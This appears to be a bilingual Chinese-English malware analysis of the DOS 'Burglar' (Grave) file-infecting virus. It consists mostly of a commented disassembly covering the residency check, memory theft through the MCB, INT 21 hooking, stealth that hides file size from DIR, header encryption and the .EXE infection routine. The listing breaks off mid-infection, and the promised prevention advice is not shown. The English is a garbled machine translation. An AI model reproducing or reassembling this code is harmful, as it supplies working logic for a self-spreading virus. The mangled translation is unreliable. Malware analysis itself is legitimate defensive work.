Burglar 病毒的分析和防治 Burglar virus analysis and prevention

病毒介绍: Virus description:
Burglar 病毒，因病毒中有字符串Grave，又称Grave 病毒，病毒长度为1150 字节，所以有的地方又称它为1150 病毒，它感染DOS的.EXE 文件，不感染Windows 的可执行文件当病毒在内存中的时候，UMB 将无法找到，在运行Windows 95 时经常引起死机。 Burglar virus, because the virus has a string Grave, also known as Grave virus, the virus length is 1150 bytes, so in some places they call it the 1150 virus, it infects DOS. EXE file, do not infect Windows executable file when When the virus in memory, UMB will not be found, running Windows 95 often lead to crashes.
病毒分析: Virus:
1. 病毒的引入部分 1 the introduction of some viruses
9F6A:0000 E95A03 JMP 035D 9F6A: 0000 E95A03 JMP 035D
9F6A:0003 90 41 54 20 54-48 45 20 47 52 41 56 45 .AT THE GRAVE 9F6A: 0003 90 41 54 20 54-48 45 20 47 52 41 56 45. AT THE GRAVE
9F6A:0010 20 4F 46 20 47 52 41 4E-44 4D 41 2E 2E 2E OF GRANDMA... 9F6A: 0010 20 4F 46 20 47 52 41 4E-44 4D 41 2E 2E 2E OF GRANDMA ...

;由于在病毒中能见到字符串At the grave of grandma,所以此病毒又称Grave 病毒... ; As can be seen in the virus string At the grave of grandma, so the virus ... the virus, also known as Grave

9F6A:035D 90 NOP 9F6A: 035D 90 NOP
9F6A:035E 90 NOP 9F6A: 035E 90 NOP
9F6A:035F BE0600 MOV SI,0000 ===> ;本数据0000 由传染时设置 9F6A: 035F BE0600 MOV SI, 0000 ===>; 0000 by the transmission of this data set
9F6A:0362 8BFE MOV DI,SI ;解密原文件头 9F6A: 0362 8BFE MOV DI, SI; decrypt the original file header
9F6A:0364 E88600 CALL 03ED ;病毒在保存原文件头信息时先加密 9F6A: 0364 E88600 CALL 03ED; virus in time to save the original file header information is encrypted
9F6A:0367 56 PUSH SI ;所以在使用时要先解密 9F6A: 0367 56 PUSH SI; so when using the first decryption

; MOV AX，F078 再执行INT 21H 是病毒用于检测自己是否驻留内存的标志;可以以此来判断内存中有无病毒 ; MOV AX, F078 and then execute INT 21H is used to detect whether the virus memory resident symbol; can also be used to determine whether the virus in memory

9F6A:0368 B430 MOV AH,30 9F6A: 0368 B430 MOV AH, 30
9F6A:036A 80C448 ADD AH,48 9F6A: 036A 80C448 ADD AH, 48
9F6A:036D B0F0 MOV AL,F0 9F6A: 036D B0F0 MOV AL, F0
9F6A:036F 86E0 XCHG AH,AL 9F6A: 036F 86E0 XCHG AH, AL
9F6A:0371 CD21 INT 21 ;驻留检测 9F6A: 0371 CD21 INT 21; presence detection
9F6A:0373 0BC0 OR AX,AX ;已驻留转03C8 9F6A: 0373 0BC0 OR AX, AX; already resides turn 03C8
9F6A:0375 7451 JZ 03C8 9F6A: 0375 7451 JZ 03C8

9F6A:0377 BF7777 MOV DI,7777 9F6A: 0377 BF7777 MOV DI, 7777
9F6A:037A 90 NOP 9F6A: 037A 90 NOP
9F6A:037B 4F DEC DI 9F6A: 037B 4F DEC DI
9F6A:037C 90 NOP 9F6A: 037C 90 NOP
9F6A:037D 90 NOP 9F6A: 037D 90 NOP
9F6A:037E 75FA JNZ 037A 9F6A: 037E 75FA JNZ 037A

9F6A:0380 1E PUSH DS ;程序PSP 段地址- 1 为内存控制块 9F6A: 0380 1E PUSH DS; program PSP segment address - 1 for the memory control block
9F6A:0381 8CC3 MOV BX,ES 9F6A: 0381 8CC3 MOV BX, ES
9F6A:0383 4B DEC BX 9F6A: 0383 4B DEC BX
9F6A:0384 8EDB MOV DS,BX ;MCB 地址 9F6A: 0384 8EDB MOV DS, BX; MCB address
9F6A:0386 BB0200 MOV BX,0002 ;是否最后一块MCB 9F6A: 0386 BB0200 MOV BX, 0002; is the last piece of MCB
9F6A:0389 807FFE5A CMP Byte Ptr [BX-02],5A ;不驻留 9F6A: 0389 807FFE5A CMP Byte Ptr [BX-02], 5A; does not reside
9F6A:038D 7536 JNZ 03C5 9F6A: 038D 7536 JNZ 03C5

9F6A:038F B95600 MOV CX,0056 ;截取0560H 字节内存 9F6A: 038F B95600 MOV CX, 0056; intercept 0560H bytes of memory
9F6A:0392 294F01 SUB [BX+01],CX ;将此块内存减少0560H 字节 9F6A: 0392 294F01 SUB [BX +01], CX; this block of bytes of memory to reduce the 0560H
9F6A:0395 294F10 SUB [BX+10],CX 9F6A: 0395 294F10 SUB [BX +10], CX
9F6A:0398 8E4710 MOV ES,[BX+10] 9F6A: 0398 8E4710 MOV ES, [BX +10]

;由于病毒将最后一块内存控制块打断，造成系统常规内存跟UMB 分离，;结果当病毒驻留内存时，用MEM 或MI 将看不到UMB，这也可以用来;判断内存中是否有病毒 ; Because the virus will be the last piece of the memory control block interrupted, resulting in system memory with the UMB conventional separation; results when the virus memory resident, or MI with MEM will not see the UMB, this can also be used; to determine whether memory virus

9F6A:039B 33C0 XOR AX,AX 9F6A: 039B 33C0 XOR AX, AX
9F6A:039D 8ED8 MOV DS,AX 9F6A: 039D 8ED8 MOV DS, AX
9F6A:039F C5878200 LDS AX,[BX+0082] 9F6A: 039F C5878200 LDS AX, [BX +0082]
9F6A:03A3 2E8984A700 MOV CS:[SI+00A7],AX ;截取INT 21 9F6A: 03A3 2E8984A700 MOV CS: [SI +00 A7], AX; intercepts INT 21
9F6A:03A8 2E8C9CA900 MOV CS:[SI+00A9],DS 9F6A: 03A8 2E8C9CA900 MOV CS: [SI +00 A9], DS
9F6A:03AD 0E PUSH CS 9F6A: 03AD 0E PUSH CS
9F6A:03AE 1F POP DS 9F6A: 03AE 1F POP DS
9F6A:03AF 33FF XOR DI,DI 9F6A: 03AF 33FF XOR DI, DI
9F6A:03B1 B93505 MOV CX,0535 ;驻留内存 9F6A: 03B1 B93505 MOV CX, 0535; the presence of memory
9F6A:03B4 FC CLD 9F6A: 03B4 FC CLD
9F6A:03B5 F3 REPZ 9F6A: 03B5 F3 REPZ
9F6A:03B6 A4 MOVSB 9F6A: 03B6 A4 MOVSB
9F6A:03B7 8ED9 MOV DS,CX 9F6A: 03B7 8ED9 MOV DS, CX
9F6A:03B9 FA CLI 9F6A: 03B9 FA CLI
9F6A:03BA 8C878400 MOV [BX+0084],ES ;设置新INT 21 到CS:0058 9F6A: 03BA 8C878400 MOV [BX +0084], ES; set up a new INT 21 to CS: 0058
9F6A:03BE C78782005800 MOV Word Ptr [BX+0082],0058 9F6A: 03BE C78782005800 MOV Word Ptr [BX +0082], 0058
9F6A:03C4 FB STI 9F6A: 03C4 FB STI
9F6A:03C5 07 POP ES 9F6A: 03C5 07 POP ES
9F6A:03C6 06 PUSH ES 9F6A: 03C6 06 PUSH ES
9F6A:03C7 1F POP DS 9F6A: 03C7 1F POP DS
9F6A:03C8 90 NOP 9F6A: 03C8 90 NOP
9F6A:03C9 5E POP SI 9F6A: 03C9 5E POP SI
9F6A:03CA 90 NOP 9F6A: 03CA 90 NOP
9F6A:03CB 8CC3 MOV BX,ES ;重定位CS:IP 及SS:SP 9F6A: 03CB 8CC3 MOV BX, ES; relocation CS: IP and SS: SP
9F6A:03CD 83C310 ADD BX,+10 9F6A: 03CD 83C310 ADD BX, +10
9F6A:03D0 2E019C0B04 ADD CS:[SI+040B],BX 9F6A: 03D0 2E019C0B04 ADD CS: [SI +040 B], BX
9F6A:03D5 2E019C0304 ADD CS:[SI+0403],BX 9F6A: 03D5 2E019C0304 ADD CS: [SI +0403], BX
9F6A:03DA 2E8E940304 MOV SS,CS:[SI+0403] 9F6A: 03DA 2E8E940304 MOV SS, CS: [SI +0403]
9F6A:03DF 2E8BA40504 MOV SP,CS:[SI+0405] 9F6A: 03DF 2E8BA40504 MOV SP, CS: [SI +0405]
9F6A:03E4 33C0 XOR AX,AX 9F6A: 03E4 33C0 XOR AX, AX
9F6A:03E6 33DB XOR BX,BX ;执行原程序 9F6A: 03E6 33DB XOR BX, BX; in the original program
9F6A:03E8 2EFFAC0904 JMP FAR CS:[SI+0409] 9F6A: 03E8 2EFFAC0904 JMP FAR CS: [SI +0409]

;====================================================================== ;================================================= =====================
;加解密原文件头 ; Decryption original header
;病毒加密源文件头的方法是按字将文件头000A * 2字节跟7776异或这也是解毒时解密原文件头的办法 ; Virus source file encryption method is based on the first word to the file header 000A * 2-byte XOR with 7776 which is the antidote to decrypt the original files when the first approach
9F6A:03ED 50 PUSH AX 9F6A: 03ED 50 PUSH AX
9F6A:03EE 81C70304 ADD DI,0403 9F6A: 03EE 81C70304 ADD DI, 0403
9F6A:03F2 B90A00 MOV CX,000A 9F6A: 03F2 B90A00 MOV CX, 000A
9F6A:03F5 B87677 MOV AX,7776 9F6A: 03F5 B87677 MOV AX, 7776
9F6A:03F8 90 NOP 9F6A: 03F8 90 NOP
9F6A:03F9 2E3105 XOR CS:[DI],AX 9F6A: 03F9 2E3105 XOR CS: [DI], AX
9F6A:03FC 47 INC DI 9F6A: 03FC 47 INC DI
9F6A:03FD 90 NOP 9F6A: 03FD 90 NOP
9F6A:03FE E2F9 LOOP 03F9 9F6A: 03FE E2F9 LOOP 03F9
9F6A:0400 58 POP AX 9F6A: 0400 58 POP AX
9F6A:0401 C3 RET 9F6A: 0401 C3 RET
2. 病毒的传播部分 (2) spread of the virus part of the

;========================================================================= ;================================================= ========================
;新的INT 21 之11,12 功能,这两个DOS 功能常用于DIR 命令,病毒在送回目录项之前先将染毒文件长度减去1150 字节,结果用DIR 命令看不到染毒文件长度的增加 ; Of 11,12 new INT 21 functions, these two functions commonly used in the DOS DIR command, returned to the directory entry of the virus in infected files before the first 1150 bytes minus the length of the result with the DIR command to see the infected files length increases

9F6A:001E 2EFF1EA700 CALL FAR CS:[00A7] ;调用原DOS 功能 9F6A: 001E 2EFF1EA700 CALL FAR CS: [00A7]; the original DOS function calls
9F6A:0023 9C PUSHF 9F6A: 0023 9C PUSHF
9F6A:0024 3CFF CMP AL,FF ;失败转0054 退出 9F6A: 0024 3CFF CMP AL, FF; failure to switch out of 0054
9F6A:0026 742C JZ 0054 9F6A: 0026 742C JZ 0054
9F6A:0028 90 NOP 9F6A: 0028 90 NOP
9F6A:0029 50 PUSH AX 9F6A: 0029 50 PUSH AX
9F6A:002A 56 PUSH SI 9F6A: 002A 56 PUSH SI
9F6A:002B 1E PUSH DS 9F6A: 002B 1E PUSH DS
9F6A:002C 2E8B362F05 MOV SI,CS:[052F] ;取DTA 地址 9F6A: 002C 2E8B362F05 MOV SI, CS: [052F]; take DTA address
9F6A:0031 2E8E1E3105 MOV DS,CS:[0531] 9F6A: 0031 2E8E1E3105 MOV DS, CS: [0531]
9F6A:0036 803CFF CMP Byte Ptr [SI],FF 9F6A: 0036 803CFF CMP Byte Ptr [SI], FF
9F6A:0039 7503 JNZ 003E ;是否扩展FCB 9F6A: 0039 7503 JNZ 003E; if the extension FCB
9F6A:003B 83C607 ADD SI,+07 ;是, 转0054 9F6A: 003B 83C607 ADD SI, +07; is transferred 0054
9F6A:003E 8A4417 MOV AL,[SI+17] ;传染标志 9F6A: 003E 8A4417 MOV AL, [SI +17]; infection signs
9F6A:0041 241D AND AL,1D 9F6A: 0041 241D AND AL, 1D
9F6A:0043 3C1D CMP AL,1D 9F6A: 0043 3C1D CMP AL, 1D
9F6A:0045 750A JNZ 0051 9F6A: 0045 750A JNZ 0051
9F6A:0047 90 NOP 9F6A: 0047 90 NOP
9F6A:0048 816C1D7E04 SUB Word Ptr [SI+1D],047E 9F6A: 0048 816C1D7E04 SUB Word Ptr [SI +1 D], 047E
9F6A:004D 835C1F00 SBB Word Ptr [SI+1F],+00 9F6A: 004D 835C1F00 SBB Word Ptr [SI +1 F], +00
9F6A:0051 1F POP DS ;如果传染 9F6A: 0051 1F POP DS; if infected
9F6A:0052 5E POP SI ;文件长- 1150 字节 9F6A: 0052 5E POP SI; long file - 1150 bytes
9F6A:0053 58 POP AX 9F6A: 0053 58 POP AX
9F6A:0054 9D POPF 9F6A: 0054 9D POPF
9F6A:0055 CA0200 RETF 0002 ;INT 21 返回 9F6A: 0055 CA0200 RETF 0002; INT 21 returned
;==================================================================== ;================================================= ===================
; 新的INT 21 中断入口 ; New INT 21 interrupt entry
;==================================================================== ;================================================= ===================
9F6A:0058 2EC606330500 MOV Byte Ptr CS:[0533],00 9F6A: 0058 2EC606330500 MOV Byte Ptr CS: [0533], 00
9F6A:005E 9C PUSHF 9F6A: 005E 9C PUSHF
9F6A:005F 3D78F0 CMP AX,F078 ;驻留检测 9F6A: 005F 3D78F0 CMP AX, F078; presence detection
9F6A:0062 90 NOP ;入口AX = F078 9F6A: 0062 90 NOP; entrance AX = F078
9F6A:0063 7506 JNZ 006B ;返回AX = 0000 9F6A: 0063 7506 JNZ 006B; return AX = 0000
9F6A:0065 33C0 XOR AX,AX 9F6A: 0065 33C0 XOR AX, AX
9F6A:0067 9D POPF 9F6A: 0067 9D POPF
9F6A:0068 CF IRET 9F6A: 0068 CF IRET
9F6A:0069 90 NOP 9F6A: 0069 90 NOP
9F6A:006A 90 NOP 9F6A: 006A 90 NOP
9F6A:006B 90 NOP 9F6A: 006B 90 NOP
9F6A:006C 80FC11 CMP AH,11 ;11,12 功能(DIR) 9F6A: 006C 80FC11 CMP AH, 11; 11,12 function (DIR)
9F6A:006F 74AD JZ 001E ;转001E 9F6A: 006F 74AD JZ 001E; turn 001E
9F6A:0071 80FC12 CMP AH,12 9F6A: 0071 80FC12 CMP AH, 12
9F6A:0074 74A8 JZ 001E 9F6A: 0074 74A8 JZ 001E
9F6A:0076 80FC3D CMP AH,3D ;打开文件 9F6A: 0076 80FC3D CMP AH, 3D; open the file
9F6A:0079 7442 JZ 00BD 9F6A: 0079 7442 JZ 00BD
9F6A:007B 80FC43 CMP AH,43 ;取/改文件属性 9F6A: 007B 80FC43 CMP AH, 43; take / change file attributes
9F6A:007E 743D JZ 00BD 9F6A: 007E 743D JZ 00BD
9F6A:0080 80FC13 CMP AH,13 ;使用FCB 删除文件 9F6A: 0080 80FC13 CMP AH, 13; delete the file using FCB
9F6A:0083 7432 JZ 00B7 9F6A: 0083 7432 JZ 00B7
9F6A:0085 80FC36 CMP AH,36 ;取磁盘剩余空间 9F6A: 0085 80FC36 CMP AH, 36; take disk space
9F6A:0088 742D JZ 00B7 9F6A: 0088 742D JZ 00B7
9F6A:008A 80FC4B CMP AH,4B ;执行文件 9F6A: 008A 80FC4B CMP AH, 4B; executable file
9F6A:008D 90 NOP ;13/36 功能在磁盘上 9F6A: 008D 90 NOP; 13/36 feature on the disk
9F6A:008E 90 NOP ;寻找一个文件传染 9F6A: 008E 90 NOP; looking for a file transmission
9F6A:008F 742C JZ 00BD ;3D/43/4B/6C 功能直接传染 9F6A: 008F 742C JZ 00BD; 3D/43/4B/6C direct transmission function
9F6A:0091 80FC6C CMP AH,6C 9F6A: 0091 80FC6C CMP AH, 6C
9F6A:0094 7427 JZ 00BD 9F6A: 0094 7427 JZ 00BD
9F6A:0096 80FC1A CMP AH,1A 9F6A: 0096 80FC1A CMP AH, 1A
9F6A:0099 750A JNZ 00A5 ;设置DTA 地址 9F6A: 0099 750A JNZ 00A5; set DTA address
9F6A:009B 2E89162F05 MOV CS:[052F],DX ;则保存DTA 地址于052F 9F6A: 009B 2E89162F05 MOV CS: [052F], DX; DTA address is stored in the 052F
9F6A:00A0 2E8C1E3105 MOV CS:[0531],DS 9F6A: 00A0 2E8C1E3105 MOV CS: [0531], DS
9F6A:00A5 9D POPF 9F6A: 00A5 9D POPF
9F6A:00A6 EAF8401100 JMP 0011:40F8 ;其它则转原INT 21 9F6A: 00A6 EAF8401100 JMP 0011:40 F8; other is transferred to the original INT 21
9F6A:00AB 90 NOP 9F6A: 00AB 90 NOP
9F6A:00AC 90 NOP 9F6A: 00AC 90 NOP
;从以上代码可以看出，病毒在打开文件，执行文件，提交文件，修改文件属性,取磁盘空间等功能都要进行传染，而这些功能在一个普通文件的执行过程中,几乎百分百的被用到，造成病毒的传播很快 ; Can be seen from the above code, the virus in the open files, execute files, submit files, modify file attributes, take disk space and other functions will have to be transmitted, and these functions in a common file of the implementation process, almost a hundred percent was used, resulting in the spread of the virus soon

;========================================================================= ;================================================= ========================
9F6A:00AD 86E0 XCHG AH,AL ;病毒调用INT 21 9F6A: 00AD 86E0 XCHG AH, AL; virus called INT 21
9F6A:00AF 90 NOP 9F6A: 00AF 90 NOP
9F6A:00B0 9C PUSHF 9F6A: 00B0 9C PUSHF
9F6A:00B1 2EFF1EA700 CALL FAR CS:[00A7] 9F6A: 00B1 2EFF1EA700 CALL FAR CS: [00A7]
9F6A:00B6 C3 RET 9F6A: 00B6 C3 RET
9F6A:00B7 2EC6067E0401 MOV Byte Ptr CS:[047E],01 ;设置DIR 传染标志 9F6A: 00B7 2EC6067E0401 MOV Byte Ptr CS: [047E], 01; set the DIR logo infection
;========================================================================== ;================================================= =========================
9F6A:00BD 90 NOP 9F6A: 00BD 90 NOP
9F6A:00BE 50 PUSH AX 9F6A: 00BE 50 PUSH AX
9F6A:00BF 53 PUSH BX 9F6A: 00BF 53 PUSH BX
9F6A:00C0 51 PUSH CX 9F6A: 00C0 51 PUSH CX
9F6A:00C1 52 PUSH DX 9F6A: 00C1 52 PUSH DX
9F6A:00C2 1E PUSH DS 9F6A: 00C2 1E PUSH DS
9F6A:00C3 06 PUSH ES 9F6A: 00C3 06 PUSH ES
9F6A:00C4 56 PUSH SI 9F6A: 00C4 56 PUSH SI
9F6A:00C5 57 PUSH DI 9F6A: 00C5 57 PUSH DI
9F6A:00C6 80FC6C CMP AH,6C ;6C 功能文件名入口DS:SI 9F6A: 00C6 80FC6C CMP AH, 6C; 6C features file name entry DS: SI
9F6A:00C9 7502 JNZ 00CD ;更改到DS:DX 9F6A: 00C9 7502 JNZ 00CD; changes to DS: DX
9F6A:00CB 8BD6 MOV DX,SI 9F6A: 00CB 8BD6 MOV DX, SI
9F6A:00CD 2E803E7E0401 CMP Byte Ptr CS:[047E],01 9F6A: 00CD 2E803E7E0401 CMP Byte Ptr CS: [047E], 01
9F6A:00D3 7406 JZ 00DB ;如果在DIR 中传染,转00DB 9F6A: 00D3 7406 JZ 00DB; If the DIR in the transmission, transfer 00DB
9F6A:00D5 E87900 CALL 0151 ;传染文件 9F6A: 00D5 E87900 CALL 0151; infected files
9F6A:00D8 EB5C JMP 0136 9F6A: 00D8 EB5C JMP 0136
9F6A:00DA 90 NOP 9F6A: 00DA 90 NOP
;======================================================================== ;================================================= =======================
9F6A:00DB 0E PUSH CS 9F6A: 00DB 0E PUSH CS
9F6A:00DC 1F POP DS 9F6A: 00DC 1F POP DS
9F6A:00DD C606340500 MOV Byte Ptr [0534],00 9F6A: 00DD C606340500 MOV Byte Ptr [0534], 00
9F6A:00E2 B02F MOV AL,2F ;取DTA 地址 9F6A: 00E2 B02F MOV AL, 2F; take the DTA address
9F6A:00E4 E8C6FF CALL 00AD 9F6A: 00E4 E8C6FF CALL 00AD
9F6A:00E7 06 PUSH ES 9F6A: 00E7 06 PUSH ES
9F6A:00E8 53 PUSH BX 9F6A: 00E8 53 PUSH BX
9F6A:00E9 B01A MOV AL,1A ;设置新DTA 到04E5 9F6A: 00E9 B01A MOV AL, 1A; set up a new DTA to 04E5
9F6A:00EB BAE504 MOV DX,04E5 9F6A: 00EB BAE504 MOV DX, 04E5
9F6A:00EE E8BCFF CALL 00AD 9F6A: 00EE E8BCFF CALL 00AD
9F6A:00F1 B04E MOV AL,4E ;寻找文件*.* 9F6A: 00F1 B04E MOV AL, 4E; find file *.*
9F6A:00F3 B92700 MOV CX,0027 9F6A: 00F3 B92700 MOV CX, 0027
9F6A:00F6 BA2704 MOV DX,0427 9F6A: 00F6 BA2704 MOV DX, 0427
9F6A:00F9 E8B1FF CALL 00AD 9F6A: 00F9 E8B1FF CALL 00AD
9F6A:00FC 7230 JB 012E 9F6A: 00FC 7230 JB 012E
9F6A:00FE A0FB04 MOV AL,[04FB] ;找到的文件 9F6A: 00FE A0FB04 MOV AL, [04FB]; find the file
9F6A:0101 241D AND AL,1D ;是否已传染 9F6A: 0101 241D AND AL, 1D; whether the infection
9F6A:0103 3C1D CMP AL,1D 9F6A: 0103 3C1D CMP AL, 1D
9F6A:0105 7423 JZ 012A ;已传染找下一文件 9F6A: 0105 7423 JZ 012A; has been transmitted to find the next file
9F6A:0107 833E010500 CMP Word Ptr [0501],+00 9F6A: 0107 833E010500 CMP Word Ptr [0501], +00
9F6A:010C 7508 JNZ 0116 9F6A: 010C 7508 JNZ 0116
9F6A:010E 813EFF04E803 CMP Word Ptr [04FF],03E8 9F6A: 010E 813EFF04E803 CMP Word Ptr [04FF], 03E8
9F6A:0114 7214 JB 012A ;文件< 03E8 找下一文件 9F6A: 0114 7214 JB 012A; file <03E8 to find the next file 9F6A:0116 C70625050305 MOV Word Ptr [0525],0503 9F6A: 0116 C70625050305 MOV Word Ptr [0525], 0503 9F6A:011C BA0305 MOV DX,0503 ;0525 为文件名指针 9F6A: 011C BA0305 MOV DX, 0503; 0525 as a pointer to the file name 9F6A:011F E82F00 CALL 0151 ;传染文件 9F6A: 011F E82F00 CALL 0151; infected files 9F6A:0122 2E803E340503 CMP Byte Ptr CS:[0534],03 9F6A: 0122 2E803E340503 CMP Byte Ptr CS: [0534], 03 9F6A:0128 7404 JZ 012E ;0534 为传染是否成功 9F6A: 0128 7404 JZ 012E; 0534 for the successful transmission 9F6A:012A B04F MOV AL,4F ;如果成功退出 9F6A: 012A B04F MOV AL, 4F; if successful exit 9F6A:012C EBCB JMP 00F9 ;否则找下一文件 9F6A: 012C EBCB JMP 00F9; or find the next file 9F6A:012E 5A POP DX 9F6A: 012E 5A POP DX 9F6A:012F 1F POP DS 9F6A: 012F 1F POP DS 9F6A:0130 9C PUSHF 9F6A: 0130 9C PUSHF 9F6A:0131 B41A MOV AH,1A ;恢复原DTA 地址 9F6A: 0131 B41A MOV AH, 1A; to restore the original DTA address 9F6A:0133 CD21 INT 21 9F6A: 0133 CD21 INT 21 9F6A:0135 9D POPF 9F6A: 0135 9D POPF 9F6A:0136 5F POP DI 9F6A: 0136 5F POP DI 9F6A:0137 5E POP SI 9F6A: 0137 5E POP SI 9F6A:0138 07 POP ES 9F6A: 0138 07 POP ES 9F6A:0139 1F POP DS 9F6A: 0139 1F POP DS 9F6A:013A 5A POP DX 9F6A: 013A 5A POP DX 9F6A:013B 59 POP CX 9F6A: 013B 59 POP CX 9F6A:013C 5B POP BX 9F6A: 013C 5B POP BX 9F6A:013D 58 POP AX 9F6A: 013D 58 POP AX 9F6A:013E 2EC6067E0400 MOV Byte Ptr CS:[047E],00 ;清DIR 传染标志 9F6A: 013E 2EC6067E0400 MOV Byte Ptr CS: [047E], 00; clear sign DIR infection 9F6A:0144 2E803E330501 CMP Byte Ptr CS:[0533],01 ;???? 9F6A: 0144 2E803E330501 CMP Byte Ptr CS: [0533], 01 ;???? 9F6A:014A 7502 JNZ 014E 9F6A: 014A 7502 JNZ 014E 9F6A:014C 33DB XOR BX,BX 9F6A: 014C 33DB XOR BX, BX 9F6A:014E E954FF JMP 00A5 9F6A: 014E E954FF JMP 00A5 ;================================================================== ;================================================= ================= ;传染文件子程序 ; Infected file subroutine 9F6A:0151 8BF2 MOV SI,DX 9F6A: 0151 8BF2 MOV SI, DX 9F6A:0153 2E89162505 MOV CS:[0525],DX 9F6A: 0153 2E89162505 MOV CS: [0525], DX 9F6A:0158 90 NOP ;此循环为寻找 9F6A: 0158 90 NOP; this cycle is to find 9F6A:0159 AC LODSB ;全路径文件名中 9F6A: 0159 AC LODSB; full path to the file name 9F6A:015A 0AC0 OR AL,AL ;文件名的起始地址=> 0525 9F6A: 015A 0AC0 OR AL, AL; file name starting address => 0525
9F6A:015C 740F JZ 016D 9F6A: 015C 740F JZ 016D
9F6A:015E 3C5C CMP AL,5C ;'\' 9F6A: 015E 3C5C CMP AL, 5C; '\'
9F6A:0160 7404 JZ 0166 9F6A: 0160 7404 JZ 0166
9F6A:0162 3C3A CMP AL,3A ;':' 9F6A: 0162 3C3A CMP AL, 3A; ':'
9F6A:0164 75F3 JNZ 0159 9F6A: 0164 75F3 JNZ 0159
9F6A:0166 2E89362505 MOV CS:[0525],SI ;0525 为文件名开始指针 9F6A: 0166 2E89362505 MOV CS: [0525], SI; 0525 beginning pointer for the file name
9F6A:016B EBEC JMP 0159 9F6A: 016B EBEC JMP 0159

9F6A:016D 80FC4B CMP AH,4B ;执行文件转0182 9F6A: 016D 80FC4B CMP AH, 4B; execute file transfer 0182
9F6A:0170 90 NOP ; 9F6A: 0170 90 NOP;
9F6A:0171 740F JZ 0182 ; 9F6A: 0171 740F JZ 0182;
9F6A:0173 817CFB2E45 CMP Word Ptr [SI-05],452E ; "E." 9F6A: 0173 817CFB2E45 CMP Word Ptr [SI-05], 452E; "E."
9F6A:0178 7507 JNZ 0181 9F6A: 0178 7507 JNZ 0181
9F6A:017A 817CFD5845 CMP Word Ptr [SI-03],4558 ; "EX" 9F6A: 017A 817CFD5845 CMP Word Ptr [SI-03], 4558; "EX"
9F6A:017F 7401 JZ 0182 ;扩展名是.EXE 转传染 9F6A: 017F 7401 JZ 0182; extension. EXE turn infect
9F6A:0181 C3 RET 9F6A: 0181 C3 RET
9F6A:0182 0E PUSH CS ;判断是否传染文件 9F6A: 0182 0E PUSH CS; determine whether the infected files
9F6A:0183 07 POP ES 9F6A: 0183 07 POP ES
9F6A:0184 2E8B362505 MOV SI,CS:[0525] 9F6A: 0184 2E8B362505 MOV SI, CS: [0525]
9F6A:0189 BF0E04 MOV DI,040E 9F6A: 0189 BF0E04 MOV DI, 040E
9F6A:018C AD LODSW 9F6A: 018C AD LODSW
9F6A:018D B90700 MOV CX,0007 ;文件名开始为 9F6A: 018D B90700 MOV CX, 0007; file names start
9F6A:0190 F2 REPNZ ;LC,WH,BT,-F,CW,KT 9F6A: 0190 F2 REPNZ; LC, WH, BT,-F, CW, KT
9F6A:0191 AF SCASW ;的文件不传染 9F6A: 0191 AF SCASW; the file is not infected
9F6A:0192 7417 JZ 01AB 9F6A: 0192 7417 JZ 01AB
9F6A:0194 2E8B362505 MOV SI,CS:[0525] 9F6A: 0194 2E8B362505 MOV SI, CS: [0525]
9F6A:0199 AC LODSB 9F6A: 0199 AC LODSB
9F6A:019A 3C00 CMP AL,00 9F6A: 019A 3C00 CMP AL, 00
9F6A:019C 740A JZ 01A8 9F6A: 019C 740A JZ 01A8
9F6A:019E 3C56 CMP AL,56 ;文件名中包括 9F6A: 019E 3C56 CMP AL, 56; the file name includes
9F6A:01A0 7409 JZ 01AB ;V 和S 字母的不传染 9F6A: 01A0 7409 JZ 01AB; V and S letters are not contagious
9F6A:01A2 3C53 CMP AL,53 9F6A: 01A2 3C53 CMP AL, 53
9F6A:01A4 7405 JZ 01AB 9F6A: 01A4 7405 JZ 01AB
9F6A:01A6 EBF1 JMP 0199 9F6A: 01A6 EBF1 JMP 0199
9F6A:01A8 E80100 CALL 01AC ;传染其它文件名的文件 9F6A: 01A8 E80100 CALL 01AC; infect other file names
9F6A:01AB C3 RET 9F6A: 01AB C3 RET
;====================================================================== ;================================================= =====================
; 开始传染可执行文件 ; Start the executable file transmission
;====================================================================== ;================================================= =====================
9F6A:01AC 8CDB MOV BX,DS ;设置新INT 24 9F6A: 01AC 8CDB MOV BX, DS; set a new INT 24
9F6A:01AE 33C0 XOR AX,AX ;到CS:042B 9F6A: 01AE 33C0 XOR AX, AX; to CS: 042B
9F6A:01B0 8ED8 MOV DS,AX 9F6A: 01B0 8ED8 MOV DS, AX
9F6A:01B2 FF369000 PUSH [0090] 9F6A: 01B2 FF369000 PUSH [0090]
9F6A:01B6 FF369200 PUSH [0092] 9F6A: 01B6 FF369200 PUSH [0092]
9F6A:01BA C70690002B04 MOV Word Ptr [0090],042B 9F6A: 01BA C70690002B04 MOV Word Ptr [0090], 042B
9F6A:01C0 8C0E9200 MOV [0092],CS 9F6A: 01C0 8C0E9200 MOV [0092], CS
9F6A:01C4 8EDB MOV DS,BX 9F6A: 01C4 8EDB MOV DS, BX
9F6A:01C6 B84300 MOV AX,0043 ;取文件属性 9F6A: 01C6 B84300 MOV AX, 0043; get file attributes
9F6A:01C9 E8E1FE CALL 00AD 9F6A: 01C9 E8E1FE CALL 00AD
9F6A:01CC 1E PUSH DS 9F6A: 01CC 1E PUSH DS
9F6A:01CD 52 PUSH DX 9F6A: 01CD 52 PUSH DX
9F6A:01CE 51 PUSH CX 9F6A: 01CE 51 PUSH CX
9F6A:01CF 33C9 XOR CX,CX ;设置文件属性 9F6A: 01CF 33C9 XOR CX, CX; set file attributes
9F6A:01D1 B84301 MOV AX,0143 ;为可读写 9F6A: 01D1 B84301 MOV AX, 0143; read-write
9F6A:01D4 E8D6FE CALL 00AD 9F6A: 01D4 E8D6FE CALL 00AD
9F6A:01D7 7308 JNB 01E1 9F6A: 01D7 7308 JNB 01E1
9F6A:01D9 2EFE063405 INC Byte Ptr CS:[0534] 9F6A: 01D9 2EFE063405 INC Byte Ptr CS: [0534]
9F6A:01DE EB65 JMP 0245 9F6A: 01DE EB65 JMP 0245
9F6A:01E0 90 NOP 9F6A: 01E0 90 NOP
9F6A:01E1 B83D02 MOV AX,023D ;打开文件 9F6A: 01E1 B83D02 MOV AX, 023D; open the file
9F6A:01E4 E8C6FE CALL 00AD 9F6A: 01E4 E8C6FE CALL 00AD
9F6A:01E7 7309 JNB 01F2 9F6A: 01E7 7309 JNB 01F2
9F6A:01E9 2EFE063405 INC Byte Ptr CS:[0534] 9F6A: 01E9 2EFE063405 INC Byte Ptr CS: [0534]
9F6A:01EE EB55 JMP 0245 9F6A: 01EE EB55 JMP 0245
9F6A:01F0 90 NOP 9F6A: 01F0 90 NOP
9F6A:01F1 90 NOP 9F6A: 01F1 90 NOP
